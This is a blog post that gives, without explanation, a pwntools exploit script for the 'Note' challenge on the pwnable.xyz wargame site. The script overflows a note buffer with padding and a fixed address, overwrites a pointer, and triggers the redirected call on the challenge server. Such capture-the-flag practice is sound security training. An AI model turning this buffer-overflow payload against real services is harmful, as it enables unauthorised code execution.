History view

Pwning in Linux

Exploit - Note pwnable.xyz

theFaunia in the wild 2019. 3. 1. 01:15

Exploit

from pwn import *
import time
context.log_level = 'debug'
p = remote("svc.pwnable.xyz",30016)
#p = process('./note')

#gdb.attach(p,'''
#break *0x0000000000400a10
#continue
#''')


p.recvuntil("> ")
p.sendline("1")

p.recvuntil("Note len? ")
p.sendline("38")

p.recvuntil("note: ")
payload = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x20\x12\x60\x00"
p.sendline(payload)

p.recvuntil("> ")
p.sendline("2")
p.recvuntil("desc: ")
p.sendline("\x3c\x09\x40\x00\x00\x00\x00\x00")

p.recvuntil("> ")
p.sendline("12")

p.recvall()
p.close()

'Pwning in Linux' 카테고리의 다른 글

Writeup - echo1  (0) 2019.03.01
Exploit - Two targets pwnable.xyz  (0) 2019.03.01
Exploit - Misalignment pwnable.xyz  (0) 2019.03.01
Exploit - GrownUp pwnable.xyz  (0) 2019.03.01
Trigger return NULL value in Malloc  (0) 2019.02.28
Comments